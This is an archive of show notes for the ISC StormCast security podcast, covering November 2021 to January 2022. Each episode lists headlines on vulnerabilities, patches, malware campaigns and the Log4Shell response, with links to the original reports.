1/27/2022, 6 minutes, 22 seconds

ISC StormCast for Wednesday, January 26th, 2022

Local Privilege Escalation Vulnerability in Polkit's pkexec (CVE-2021-4034) https://isc.sans.edu/forums/diary/Local+privilege+escalation+vulnerability+in+polkits+pkexec+CVE20214034/28272/
Emotet Stops Using 0.0.0.0 in Spambot Traffic https://isc.sans.edu/forums/diary/Emotet+Stops+Using+0000+in+Spambot+Traffic/28270/
VMware Warns of Log4j Exploitation https://www.vmware.com/security/advisories/VMSA-2021-0028.html https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/
1/26/2022 5 minutes, 17 seconds

ISC StormCast for Tuesday, January 25th, 2022

MoonBounce UEFI Malware https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/
Exploit of SonicWall CVE-2021-20038 https://twitter.com/buffaloverflow/status/1485671824725786633
Dell EMC AppSync Vulnerability https://www.dell.com/support/kbdoc/de-de/000195377/dsa-2022-003-dell-emc-appsync-security-update-for-multiple-vulnerabilities
Twitter API Keys Leaked in GitHub https://incognitatech.medium.com/using-twitter-to-notify-careless-developers-the-unorthodox-way-d71478ad367a
1/25/2022 6 minutes, 8 seconds

ISC StormCast for Monday, January 24th, 2022

Obscure Wininet.dll Feature https://isc.sans.edu/forums/diary/Obscure+Wininetdll+Feature/28262/
Mixed VBA and Excel 4 Macro in Targeted Excel Sheet https://isc.sans.edu/forums/diary/Mixed+VBA+Excel4+Macro+In+a+Targeted+Excel+Sheet/28264/ https://techcommunity.microsoft.com/t5/excel-blog/excel-4-0-xlm-macros-now-restricted-by-default-for-customer/ba-p/3057905
F5 January 2022 Patches https://support.f5.com/csp/article/K40084114
McAfee Privilege Escalation https://kc.mcafee.com/corporate/index?page=content&id=SB10378
1/24/2022 6 minutes, 12 seconds

ISC StormCast for Friday, January 21st, 2022

RedLine Stealer Delivered Through FTP https://isc.sans.edu/forums/diary/RedLine+Stealer+Delivered+Through+FTP/28258/
Google Camera Alters QR Codes https://www.heise.de/hintergrund/Googles-Kamera-verfaelscht-Links-in-QR-Codes-6332669.html https://www.androidpolice.com/google-camera-randomly-changes-some-qr-code-urls-on-android-12/
Linux Kernel Privilege Escalation / Container Escape https://seclists.org/oss-sec/2022/q1/54 https://access.redhat.com/security/cve/cve-2022-0185
Crypto.com 2FA Bypass https://threatpost.com/2fa-bypassed-crypto-com-heist/177846/
Windows Policies to Avoid https://techcommunity.microsoft.com/t5/windows-it-pro-blog/why-you-shouldn-t-set-these-25-windows-policies/ba-p/3066178
1/21/2022 6 minutes, 14 seconds

ISC StormCast for Thursday, January 20th, 2022

0.0.0.0 in Emotet Spambot Traffic https://isc.sans.edu/forums/diary/0000+in+Emotet+Spambot+Traffic/28254/
Linux Patch to Make 0.0.0.0/8 Routable https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=96125bf9985a
WebKit Patch for Cross Origin Database Name Leak https://trac.webkit.org/changeset/288078/webkit
ACER Care Center Privilege Escalation https://aptw.tf/2022/01/20/acer-care-center-privesc.html
Improper Input Validation Vulnerability in Serv-U https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247
1/20/2022 6 minutes, 13 seconds

ISC StormCast for Wednesday, January 19th, 2022

Phishing E-Mail With an Advertisement https://isc.sans.edu/forums/diary/Phishing+email+withan+advertisement/28250/
VirusTotal Credential https://www.safebreach.com/blog/2022/the-perfect-cyber-crime/
Oracle Quarterly Critical Patch Update https://www.oracle.com/security-alerts/cpujan2022.html
Box MFA Bypass https://www.varonis.com/blog/box-mfa-bypass-sms
1/19/2022 5 minutes, 30 seconds

ISC StormCast for Tuesday, January 18th, 2022

Log4Shell Attacks Getting Smarter https://isc.sans.edu/forums/diary/Log4Shell+Attacks+Getting+Smarter/28246/
Microsoft Releases Special Update to Deal with January Update Fail https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-oob-updates-for-january-windows-update-issues/
Cisco Unified Contact Center Management Portal and Unified Contact Center Domain Manager Privilege Escalation Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ccmp-priv-esc-JzhTFLm4
Zoho Critical Security Patch Released in Desktop Central and Desktop Central MSP https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022
Google Chrome Restricting Private Network Access https://developer.chrome.com/blog/private-network-access-preflight/
1/18/2022 5 minutes, 26 seconds

ISC StormCast for Monday, January 17th, 2022

Use of Alternate Data Streams in Research Scans https://isc.sans.edu/forums/diary/Use+of+Alternate+Data+Streams+in+Research+Scans+for+indexjsp/28240/
Microsoft Resumes Windows Server 2019 Cumulative Updates https://www.bleepingcomputer.com/news/microsoft/microsoft-resumes-rollout-of-january-windows-server-updates/
Safari IndexedDB Leak https://fingerprintjs.com/blog/indexeddb-api-browser-vulnerability-safari-15/
1/17/2022 5 minutes, 17 seconds

ISC StormCast for Friday, January 14th, 2022

MSFT Patch Issues https://borncity.com/win/2022/01/12/patchday-windows-8-1-server-2012-r2-updates-11-januar-2022-mgliche-boot-probleme/ https://support.microsoft.com/en-us/topic/january-11-2022-kb5009624-monthly-rollup-23f4910b-6bdd-475c-bb4d-c0e961aff0bc https://support.microsoft.com/en-us/topic/january-11-2022-kb5009595-security-only-update-060870c2-ad08-40e5-b000-a9f6d40c0831
Jenkins Security Advisory 2022-01-1 https://www.jenkins.io/security/advisory/2022-01-12/
Qakbot Configuration Decryptor https://github.com/drole/qakbot-registry-decrypt
Android allows Disabling 2G https://www.bleepingcomputer.com/news/security/android-users-can-now-disable-2g-to-block-stingray-attacks/
Weakness in Microsoft Defender https://twitter.com/splinter_code/status/1481073265380581381
1/14/2022 5 minutes, 31 seconds

ISC StormCast for Thursday, January 13th, 2022

A Quick CVE-2022-21907 FAQ https://isc.sans.edu/forums/diary/A+Quick+CVE202221907+FAQ+work+in+progress/28234/
Details Released Regarding Patched SonicWall Vulnerabilities https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/
iOS/iPadOS Fixing HomeKit Vulnerability / Private Relay Issues https://support.apple.com/en-us/HT201222 https://www.macrumors.com/2022/01/12/apple-icloud-private-relay-ios-15-2/
Attacking RDP From Inside https://www.cyberark.com/resources/threat-research-blog/attacking-rdp-from-inside
Nanocore, Netwire and AsyncRAT Spreading Campaign Uses Public Cloud Infrastructure https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html
1/13/2022 5 minutes, 31 seconds

ISC StormCast for Wednesday, January 12th, 2022

Microsoft Patch Tuesday - January 2022 https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+January+2022/28230/
Adobe Updates https://helpx.adobe.com/security.html
1/12/2022 6 minutes, 32 seconds

ISC StormCast for Tuesday, January 11th, 2022

New macOS Vulnerability Could Lead to Unauthorized User Data Access https://www.microsoft.com/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access
Exploiting URL Parsers https://claroty.com/wp-content/uploads/2022/01/Exploiting-URL-Parsing-Confusion.pdf
NPM libs "colors" and "faker" sabotaged by developer https://www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps/
1/11/2022 5 minutes, 39 seconds

ISC StormCast for Monday, January 10th, 2022

Extracting Cobalt Strike Beacons from MSBuild Scripts https://isc.sans.edu/forums/diary/Extracting+Cobalt+Strike+Beacons+from+MSBuild+Scripts/28200/
The JNDI Strikes Back: Unauthenticated RCE in H2 Database Console https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/
Trojanized dnSpy app drops malware cocktail https://www.bleepingcomputer.com/news/security/trojanized-dnspy-app-drops-malware-cocktail-on-researchers-devs/
FIN7 Attackers Sending Malicious USB Sticks https://www.bleepingcomputer.com/news/security/fbi-hackers-use-badusb-to-target-defense-firms-with-ransomware/
1/10/2022 5 minutes, 31 seconds

ISC StormCast for Friday, January 7th, 2022

Malicious Python Script Targeting Chinese People https://isc.sans.edu/forums/diary/Malicious+Python+Script+Targeting+Chinese+People/28220/
Google Docs Comment Exploit Allows for Distribution of Phishing and Malware https://www.avanan.com/blog/google-docs-comment-exploit-allows-for-distribution-of-phishing-and-malware
Google Voice Authentication Scams https://www.fbi.gov/contact-us/field-offices/portland/news/press-releases/oregon-fbi-tech-tuesday-building-a-digital-defense-against-google-voice-authentication-scams
Norton Crypto Miner https://investor.nortonlifelock.com/About/Investors/press-releases/press-release-details/2021/NortonLifeLock-Unveils-Norton-Crypto/default.aspx
1/7/2022 5 minutes, 28 seconds

ISC StormCast for Thursday, January 6th, 2022

Code Reuse in the Malware Landscape https://isc.sans.edu/forums/diary/Code+Reuse+In+the+Malware+Landscape/28216/
ZLoader Campaign Exploiting Signature Verification Bug https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/
VMware Virtual CD-ROM Vulnerability https://www.vmware.com/security/advisories/VMSA-2022-0001.html
Honda Y2K22 Bug https://www.bleepingcomputer.com/news/technology/honda-acura-cars-hit-by-y2k22-bug-that-rolls-back-clocks-to-2002/
1/6/2022 5 minutes, 29 seconds

ISC StormCast for Wednesday, January 5th, 2022

A Simple Batch File That Blocks People https://isc.sans.edu/forums/diary/A+Simple+Batch+File+That+Blocks+People/28212/
Windows Server Remote Desktop Emergency Update https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#2772
Malicious Telegram Installer Includes Purple Fox Rootkit https://blog.minerva-labs.com/malicious-telegram-installer-drops-purple-fox-rootkit
Web Skimmer Campaign Targets Real Estate Websites https://unit42.paloaltonetworks.com/web-skimmer-video-distribution/
1/5/2022 5 minutes, 20 seconds

ISC StormCast for Tuesday, January 4th, 2022

McAfee Phishing Campaign with a Nice Fake Scan https://isc.sans.edu/forums/diary/McAfee+Phishing+Campaign+with+a+Nice+Fake+Scan/28208/
Trend Micro Apex One Patch https://success.trendmicro.com/solution/000289996
E-commerce Bots Using Cheap Domain Registration Services https://threatpost.com/ecommerce-bots-domain-registration-account-fraud/177305/
iOS HomeKit DoS Vulnerability https://trevorspiniolas.com/doorlock/doorlock.html
1/4/2022 5 minutes, 38 seconds

ISC StormCast for Monday, January 3rd, 2022

Exchange Server Year 2022 Bug https://isc.sans.edu/forums/diary/Exchange+Server+Email+Trapped+in+Transport+Queues/28204/ https://techcommunity.microsoft.com/t5/exchange-team-blog/email-stuck-in-exchange-on-premises-transport-queues/ba-p/3049447
Agent Tesla Updates https://isc.sans.edu/forums/diary/Agent+Tesla+Updates+SMTP+Data+Exfiltration+Technique/28190/ https://isc.sans.edu/forums/diary/Do+you+want+your+Agent+Tesla+in+the+300+MB+or+8+kB+package/28202/
Forensics Issues and Techniques to Improve Security in SSD with Flex Capacity Feature https://arxiv.org/ftp/arxiv/papers/2112/2112.13923.pdf
iLO Bleed Attack https://threats.amnpardaz.com/en/2021/12/28/implant-arm-ilobleed-a/
1/3/2022 7 minutes, 35 seconds

ISC StormCast for Thursday, December 30th, 2021

Log4j 2 Security Vulnerabilities Update Guide https://isc.sans.edu/forums/diary/Log4j+2+Security+Vulnerabilities+Update+Guide/28188/
Microsoft Defender Log4j False Positives https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-log4j-scanner-triggers-false-positive-alerts/
T-Mobile SIM Swapping Alerts https://www.bleepingcomputer.com/news/security/t-mobile-says-new-data-breach-caused-by-sim-swap-attacks/
Fisher-Price Bluetooth Phone Privacy Flaw https://www.pentestpartners.com/security-blog/audio-bugging-with-the-fisher-price-chatter-bluetooth-telephone/
12/30/2021 4 minutes, 10 seconds

ISC StormCast for Wednesday, December 29th, 2021

Log4j Vulnerability CVE-2021-44832 https://logging.apache.org/log4j/2.x/security.html#CVE-2021-44832
LotL Classifiers https://isc.sans.edu/forums/diary/LotL+Classifier+tests+for+shells+exfil+and+miners/28184/
LastPass Credential Stuffing https://www.bleepingcomputer.com/news/security/lastpass-users-warned-their-master-passwords-are-compromised/
12/29/2021 4 minutes, 54 seconds

ISC StormCast for Tuesday, December 28th, 2021

Attackers are Abusing MSBuild to Evade Defenses and Implant Cobalt Strike Beacons https://isc.sans.edu/forums/diary/Attackers+are+abusing+MSBuild+to+evade+defenses+and+implant+Cobalt+Strike+beacons/28180/
Bypassing File Quarantine, Gatekeeper and Notarization Requirements https://objective-see.com/blog/blog_0x6A.html
Spider-Miner: Trojanized Version of Spiderman No Way Home https://blog.reasonlabs.com/2021/12/23/spider-miner-with-great-power-comes-great-problems/
12/28/2021 4 minutes, 41 seconds

ISC StormCast for Monday, December 27th, 2021

Log4j/Log4Shell and Cloud Internal Metadata Services https://isc.sans.edu/forums/diary/log4shell+and+cloud+provider+internal+meta+data+services+IMDS/28168/ https://isc.sans.edu/forums/diary/Defending+Cloud+IMDS+Against+log4shell+and+more/28170/
Log4j/Log4Shell Pushing Crypto Miner https://isc.sans.edu/forums/diary/Example+of+how+attackers+are+trying+to+push+crypto+miners+via+Log4Shell/28172/
Microsoft Vulnerable and Malicious Driver Reporting Center https://www.microsoft.com/security/blog/2021/12/08/improve-kernel-security-with-the-new-microsoft-vulnerable-and-malicious-driver-reporting-center/
Azure Source Code Leak https://blog.wiz.io/azure-app-service-source-code-leak/
12/27/2021 5 minutes, 46 seconds

ISC StormCast for Thursday, December 23rd, 2021

Forensics Challenge Solution https://isc.sans.edu/forums/diary/December+2021+Forensic+Contest+Answers+and+Analysis/28160/
CAB-less 40444 https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/
Ellume COVID Home Test Weakness https://github.com/FSecureLABS/Ellume-COVID-Test_Research-Files
12/23/2021 4 minutes

ISC StormCast for Wednesday, December 22nd, 2021

More Undetected PowerShell Droppers https://isc.sans.edu/forums/diary/More+Undetected+PowerShell+Dropper/28158/
Apache Patches https://httpd.apache.org/security/vulnerabilities_24.html
Auerswald COMpact Multiple Backdoors https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-007/-auerswald-compact-multiple-backdoors
Vulnerabilities in Garrett Metal Detectors https://blog.talosintelligence.com/2021/12/vuln-spotlight-garrett-metal-detector.html#more
12/22/2021 4 minutes, 59 seconds

ISC StormCast for Tuesday, December 21st, 2021

PowerPoint Attachments: Agent Tesla and Code Reuse in Malware https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/
VMware Workspace ONE Patch / log4j status https://www.vmware.com/security/advisories.html
Attacks Against Building Automation https://limessecurity.com/en/knxlock/
12/21/2021 5 minutes, 55 seconds

ISC StormCast for Monday, December 20th, 2021

Disaster Recovery Automation Using Public DNS APIs https://isc.sans.edu/forums/diary/DR+Automation+Using+Public+DNS+APIs/28146/
Office 2021: VBA Project Version https://isc.sans.edu/forums/diary/Office+2021+VBA+Project+Version/28150/
Log4j Updates https://www.blumira.com/analysis-log4shell-local-trigger/ https://logging.apache.org/log4j/2.x/security.html
12/20/2021 6 minutes, 31 seconds

ISC StormCast for Monday, December 20th, 2021

Disaster Recovery Automation Using Public DNS APIs https://isc.sans.edu/forums/diary/DR+Automation+Using+Public+DNS+APIs/28146/ Office 2021: VBA Project Version https://isc.sans.edu/forums/diary/Office+2021+VBA+Project+Version/28150/ Log4j Updates https://www.blumira.com/analysis-log4shell-local-trigger/ https://logging.apache.org/log4j/2.x/security.html
12/20/20216 minutes, 31 seconds

ISC StormCast for Friday, December 17th, 2021

How the "Contact Forms" Campaign Tricks People https://isc.sans.edu/forums/diary/How+the+Contact+Forms+campaign+tricks+people/28142/
Bluetooth Used to Extract WiFi Secrets https://arxiv.org/pdf/2112.05719.pdf
Lenovo Privilege Escalation Vulnerability https://support.lenovo.com/cy/en/product_security/len-75210 https://research.nccgroup.com/2021/12/15/technical-advisory-lenovo-imcontroller-local-privilege-escalation-cve-2021-3922-cve-2021-3969/
Log4j Updates https://github.com/cisagov/log4j-affected-db https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+December+2021 https://twitter.com/sans_isc/status/1471611522694717445
12/17/2021 - 7 minutes, 42 seconds

ISC StormCast for Thursday, December 16th, 2021

Undetected PowerShell Backdoor https://isc.sans.edu/forums/diary/Simple+but+Undetected+PowerShell+Backdoor/28138/
Adobe Security Updates https://helpx.adobe.com/security.html
Remote Deserialization Bug in Microsoft RDP Client Through Smart Card Extension https://thalium.github.io/blog/posts/deserialization-bug-through-rdp-smart-card-extension/
WebKit Bug Exploitable on PS4 https://arstechnica.com/gaming/2021/12/new-ps4-homebrew-exploit-points-to-similar-ps5-hacks-to-come/
12/16/2021 - 5 minutes, 45 seconds

ISC StormCast for Wednesday, December 15th, 2021

Microsoft Patches https://isc.sans.edu/forums/diary/Microsoft+December+2021+Patch+Tuesday/28132/
Log4j Updates https://isc.sans.edu/forums/diary/Log4j+2150+and+previously+suggested+mitigations+may+not+be+enough/28134/
Log4j Scanner https://github.com/dtact/divd-2021-00038--log4j-scanner
Apple Updates https://support.apple.com/en-us/HT201222
12/15/2021 - 5 minutes, 20 seconds

ISC StormCast for Tuesday, December 14th, 2021

Log4Shell Becoming Part of the Day to Day Grind https://isc.sans.edu/forums/diary/Log4Shell+exploited+to+implant+coin+miners/28124/ https://www.youtube.com/watch?v=oC2PZB5D3Ys
Google Chrome Update https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop_13.html
Malicious PyPI Packages https://medium.com/ochrona/3-new-malicious-packages-found-on-pypi-a6bbb14b5e2
12/14/2021 - 5 minutes, 7 seconds

ISC StormCast for Monday, December 13th, 2021

Remote Code Execution in log4j2 https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/
Log4j Zero Day https://www.lunasec.io/docs/blog/log4j-zero-day/
Log4j2/Log4Shell Followup: What we see and how to defend and how to access our data https://isc.sans.edu/forums/diary/Log4j+Log4Shell+Followup+What+we+see+and+how+to+defend+and+how+to+access+our+data/28122/
Log4Shell Vendor Bulletins https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
12/13/2021 - 7 minutes, 44 seconds

ISC StormCast for Friday, December 10th, 2021

Phishing Direct Messages via Discord https://isc.sans.edu/forums/diary/Phishing+Direct+Messages+via+Discord/28114/
Vulnerable MikroTik Routers https://eclypsium.com/2021/12/09/when-honey-bees-become-murder-hornets/
log4j RCE 0-day https://www.lunasec.io/docs/blog/log4j-zero-day/
SonicWall SMA 100 Patch https://www.sonicwall.com/support/product-notification/product-security-notice-sma-100-series-vulnerability-patches-q4-2021/211201154715443/
12/10/2021 - 6 minutes, 30 seconds

ISC StormCast for Thursday, December 9th, 2021

December 2021 Forensic Challenge https://isc.sans.edu/forums/diary/December+2021+Forensic+Challenge/28108/
Microsoft and GitHub OAuth Implementation Vulnerabilities Lead to Redirection Attacks https://www.proofpoint.com/us/blog/cloud-security/microsoft-and-github-oauth-implementation-vulnerabilities-lead-redirection
Android Patch Day https://source.android.com/security/bulletin/2021-12-01?hl=en
12/9/2021 - 5 minutes, 30 seconds

ISC StormCast for Wednesday, December 8th, 2021

Webshells, Webshells everywhere! https://isc.sans.edu/forums/diary/Webshells+Webshells+everywhere/28106/
AWS Outage https://status.aws.amazon.com
Misconfigured Kafdrop Puts Companies' Apache Kafka Completely Exposed https://spectralops.io/blog/misconfigured-kafdrop-puts-companies-apache-kafka-completely-exposed/
Windows 10 RCE: The exploit is in the link https://positive.security/blog/ms-officecmd-rce
XSinator.com: From a Formal Model to the Automatic Evaluation of Cross-Site Leaks in Web Browsers https://xsinator.com/paper.pdf
12/8/2021 - 5 minutes, 37 seconds

ISC StormCast for Tuesday, December 7th, 2021

The Importance of Out of Band Networks https://isc.sans.edu/forums/diary/The+Importance+of+OutofBand+Networks/28102/
Kaseya Unitrends Backup Appliance Updates https://helpdesk.kaseya.com/hc/en-gb/articles/4412762258961
Is KAX17 Performing De-Anonymization Attacks Against Tor Users? https://nusenu.medium.com/is-kax17-performing-de-anonymization-attacks-against-tor-users-42e566defce8
Google Chrome Update, No 0-Days https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop.html
12/7/2021 - 5 minutes, 30 seconds

ISC StormCast for Monday, December 6th, 2021

The UPX Packer Will Never Die https://isc.sans.edu/forums/diary/The+UPX+Packer+Will+Never+Die/28096/
Survey of Airgap Attacks https://www.welivesecurity.com/2021/12/01/jumping-air-gap-15-years-nation-state-effort/
Ubiquiti Victim of Insider Extortion https://www.justice.gov/usao-sdny/pr/former-employee-technology-company-charged-stealing-confidential-data-and-extorting
12/6/2021 - 5 minutes, 22 seconds

ISC StormCast for Friday, December 3rd, 2021

TA551 (Shathak) Pushes IcedID (Bokbot) https://isc.sans.edu/forums/diary/TA551+Shathak+pushes+IcedID+Bokbot/28092/
pip-audit: scanning Python packages for known vulnerabilities https://pypi.org/project/pip-audit/
WiFi Router Flaws https://www.iot-inspector.com/blog/router-security-check-2021/
SANS Holiday Hack Challenge https://www.sans.org/mlp/holiday-hack-challenge/
12/3/2021 - 14 minutes, 23 seconds

ISC StormCast for Thursday, December 2nd, 2021

Info-Stealer Using webhook.site to Exfiltrate Data https://isc.sans.edu/forums/diary/InfoStealer+Using+webhooksite+to+Exfiltrate+Data/28088/
Mozilla NSS Library Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=2237
EwDoor Botnet is Attacking AT&T Customers https://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/
JAMF Pro 10.32 Patch https://community.jamf.com/t5/jamf-pro/what-s-new-in-jamf-pro-10-32-release/m-p/246505
12/2/2021 - 6 minutes, 15 seconds

ISC StormCast for Wednesday, December 1st, 2021

Hunting for PHPUnit Installed via Composer https://isc.sans.edu/forums/diary/Hunting+for+PHPUnit+Installed+via+Composer/28084/
Microsoft Defender Scares Admins with Emotet False Positives https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-scares-admins-with-emotet-false-positives/
Printing Shellz: HP Printer Vulnerabilities https://blog.f-secure.com/hp-printer-vulnerabilities/?_ga=2.125707850.1160056027.1638325485-2056233716.1638325485
Unpatched Local Privilege Escalation in Mobile Device Management Service https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html
12/1/2021 - 6 minutes, 24 seconds

ISC StormCast for Tuesday, November 30th, 2021

Wireshark 3.6.0 Released https://isc.sans.edu/forums/diary/Wireshark+360+Released/28076/
Google Cloud Security Report https://services.google.com/fh/files/misc/gcat_threathorizons_full_nov2021.pdf
Zoom Patch https://explore.zoom.us/en/trust/security/security-bulletin/
Slack DNSSEC Experience Report https://slack.engineering/what-happened-during-slacks-dnssec-rollout/
11/30/2021 - 5 minutes, 25 seconds

ISC StormCast for Monday, November 29th, 2021

Phishing Page Hiding Itself Using a Dynamically Adjusted IP-Based Allow List https://isc.sans.edu/forums/diary/Phishing+page+hiding+itself+using+dynamically+adjusted+IPbased+allow+list/28070/
Trickbot Phishing Checks Screen Resolution to Evade Researchers https://www.bleepingcomputer.com/news/security/trickbot-phishing-checks-screen-resolution-to-evade-researchers/
QNAP QVR Patch https://www.qnap.com/de-de/security-advisory/qsa-21-51
CronRAT Malware Hiding in cron https://sansec.io/research/cronrat
11/29/2021 - 6 minutes, 4 seconds

ISC StormCast for Wednesday, November 24th, 2021

YARA Rule for OOXML Maldocs: Fewer False Positives https://isc.sans.edu/forums/diary/YARA+Rule+for+OOXML+Maldocs+Less+False+Positives/28066/
Zero-Day Windows Installer Exploit https://www.bleepingcomputer.com/news/security/malware-now-trying-to-exploit-new-windows-installer-zero-day/
VMware vCenter Vulnerability and Patch https://www.vmware.com/security/advisories/VMSA-2021-0027.html
11/24/2021 - 3 minutes, 13 seconds

ISC StormCast for Tuesday, November 23rd, 2021

Simple YARA Rules for Office Maldocs https://isc.sans.edu/forums/diary/Simple+YARA+Rules+for+Office+Maldocs/28062/
Retailers Urged to Patch Magento https://www.theregister.com/2021/11/22/ncsc_magento_updates_black_friday_reminder/
PoC of CVE-2021-42321: pop mspaint.exe on the target https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398
BEC Via Exchange Flaws https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html
Windows Priv. Escalation PoC https://github.com/klinix5/InstallerFileTakeOver
PHP deserialize vulnerability in CloudLinux Imunify360 https://blog.talosintelligence.com/2021/11/vulnerability-spotlight-php-deserialize.html
11/23/2021 - 4 minutes, 25 seconds

ISC StormCast for Monday, November 22nd, 2021

Hikvision Security Cameras Potentially Exposed to Remote Code Execution https://isc.sans.edu/forums/diary/Hikvision+Security+Cameras+Potentially+Exposed+to+Remote+Code+Execution/28056/
Detecting PAM Backdoors https://isc.sans.edu/forums/diary/Backdooring+PAM/28058/
Rusted Anchors: A National Client-Side View of Hidden Root CAs in the Web PKI Ecosystem https://dl.acm.org/doi/pdf/10.1145/3460120.3484768
CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory https://www.netspi.com/blog/technical/cloud-penetration-testing/azure-cloud-vulnerability-credmanifest/
11/22/2021 - 5 minutes

ISC StormCast for Friday, November 19th, 2021

JavaScript Downloader Delivers Agent Tesla Trojan https://isc.sans.edu/forums/diary/JavaScript+Downloader+Delivers+Agent+Tesla+Trojan/28050/
Exposed Firefox cookies.sqlite Databases https://www.theregister.com/2021/11/18/firefox_cookies_github/
FBI Warns of FatPipe VPN Exploits https://www.ic3.gov/Media/News/2021/211117-2.pdf
Abusing ClouDNS https://blog.netlab.360.com/the-pitfall-of-threat-intelligence-whitelisting-specter-botnet-is-taking-over-top-legit-dns-domains-by-using-cloudns-service/
11/19/2021 - 6 minutes, 42 seconds

ISC StormCast for Thursday, November 18th, 2021

DDS Protocol Implementation Vulnerabilities https://us-cert.cisa.gov/ics/advisories/icsa-21-315-02
Siemens TCP/IP Flaws https://www.forescout.com/blog/new-critical-vulnerabilities-found-on-nucleus-tcp-ip-stack/
Netgear UPnP Stack-Based Buffer Overflow https://blog.grimm-co.com/2021/11/seamlessly-discovering-netgear.html
11/18/2021 - 4 minutes, 35 seconds

ISC StormCast for Wednesday, November 17th, 2021

Emotet Returns https://isc.sans.edu/forums/diary/Emotet+Returns/28044/
GitHub Improves npm Security https://github.blog/2021-11-15-githubs-commitment-to-npm-ecosystem-security/
Intel CPU Debug Vulnerability https://www.ptsecurity.com/ww-en/about/news/positive-technologies-discovers-vulnerability-in-intel-processors-used-in-laptops-cars-and-other-devices/ https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00528.html
Home Router Vulnerability Listing https://modemly.com/m1/pulse
11/17/2021 - 6 minutes, 43 seconds

ISC StormCast for Tuesday, November 16th, 2021

Microsoft Emergency Update Fixes AD Authentication Problems https://support.microsoft.com/en-us/topic/november-14-2021-kb5008601-os-build-14393-4771-out-of-band-c8cd33ce-3d40-4853-bee4-a7cc943582b9
Using Copy/Paste to Change a Microsoft AD Password https://isc.sans.edu/forums/diary/Changing+your+AD+Password+Using+the+Clipboard+Not+as+Easy+as+Youd+Think/28036/
Parking Pages Used to Distribute Malware https://blog.netlab.360.com/zhatuniubility-malware-uses-namesilo-parking-pages-and-googles-custom-pages-to-spread/
Blacksmith Revives Rowhammer https://comsec.ethz.ch/research/dram/blacksmith/
11/16/2021 - 6 minutes, 41 seconds

ISC StormCast for Monday, November 15th, 2021

Not So Fake FBI E-Mails https://www.fbi.gov/news/pressrel/press-releases/fbi-statement-on-incident-involving-fake-emails https://isc.sans.edu/forums/diary/External+Email+System+FBI+Compromised+Sending+Out+Fake+Warnings/28034/ https://twitter.com/spamhaus/status/1459450061696417792
Reversing Obfuscated Maldoc with BASE64 https://isc.sans.edu/forums/diary/Obfuscated+Maldoc+Reversed+BASE64/28030/
Zoom Updates https://explore.zoom.us/en/trust/security/security-bulletin/
VMware vCenter Update https://www.vmware.com/security/advisories/VMSA-2021-0025.html
Windows User Profile 0-Day LPE https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html
11/15/2021 - 5 minutes, 45 seconds

ISC StormCast for Friday, November 12th, 2021

In Memory of Alan Paller, Cyber Security Industry Titan and SANS Institute Founder https://www.sans.org/press/announcements/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away/ https://isc.sans.edu/forums/diary/In+Memory+of+Alan+Paller/28026/
11/12/2021 - 3 minutes

ISC StormCast for Thursday, November 11th, 2021

Shadow IT Makes People More Vulnerable to Phishing https://isc.sans.edu/forums/diary/Shadow+IT+Makes+People+More+Vulnerable+to+Phishing/28022/
Palo Alto Networks GlobalProtect VPN CVE-2021-3064 https://www.randori.com/blog/cve-2021-3064/?i=2
Citrix ADC/Gateway/SD-WAN WANOP Patch https://support.citrix.com/article/CTX330728
HPE Aruba Breach https://www.arubanetworks.com/support-services/security-bulletins/central-incident-faq/
LiveStream: Application Security; Web Apps, APIs & Microservices youtu.be/6gGB7skXvpg 2pm ET Today (not 1pm as mentioned in the podcast)
11/11/2021 - 6 minutes, 35 seconds

ISC StormCast for Wednesday, November 10th, 2021

Microsoft November 2021 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+November+2021+Patch+Tuesday/28018/
Adobe Patches https://helpx.adobe.com/security.html
BusyBox Vulnerabilities https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/
11/10/2021 - 6 minutes, 35 seconds

ISC StormCast for Tuesday, November 9th, 2021

(Ab)Using Security Tools & Controls for the Bad https://isc.sans.edu/forums/diary/AbUsing+Security+Tools+Controls+for+the+Bad/28014/
